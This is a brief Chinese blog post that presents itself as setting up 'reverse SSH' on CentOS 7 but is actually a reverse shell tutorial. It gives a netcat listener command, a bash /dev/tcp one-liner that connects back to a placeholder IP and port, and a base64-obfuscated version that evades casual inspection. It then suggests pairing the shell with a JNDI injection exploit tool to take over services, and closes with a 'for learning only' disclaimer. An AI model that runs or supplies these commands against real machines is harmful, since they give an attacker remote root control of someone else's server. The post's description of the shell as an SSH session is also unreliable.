CentOS7 反向建立ssh

目标

0、准备A B两台服务器

1、B服务器监听某个端口

2、A服务器向该端口发送请求

3、B服务器接收到该请求后直接临时拿到A服务器的的root SSH会话

 

操作

1、B服务器监听9876:

 nc -lvvp 9876

 

2、A服务器向B发送请求

A 明文版

bash -i >& /dev/tcp/[ip]/[port] 0>&1

B base 64版(示例)

bash -c {echo,YmFz这个就是BASE64字符串==}|{base64,-d}|{bash,-i}

示例中的的BASE64明文即为“bash -i >& /dev/tcp/[ip]/[port] 0>&1"

 

3、查看B的控制台,已经临时获取了一个ssh会话,可操作A,权限是root

 

配合项目:【https://github.com/welk1n/JNDI-Injection-Exploit】以及一些漏洞,可实现一些服务权限获取

 

注意:非法入侵别人电脑是违法行为,本文仅供学习,请勿非法使用本文所提技术。

posted @ 2021-12-23 14:48  剑握在手  阅读(279)  评论(0编辑  收藏  举报
返回顶部↑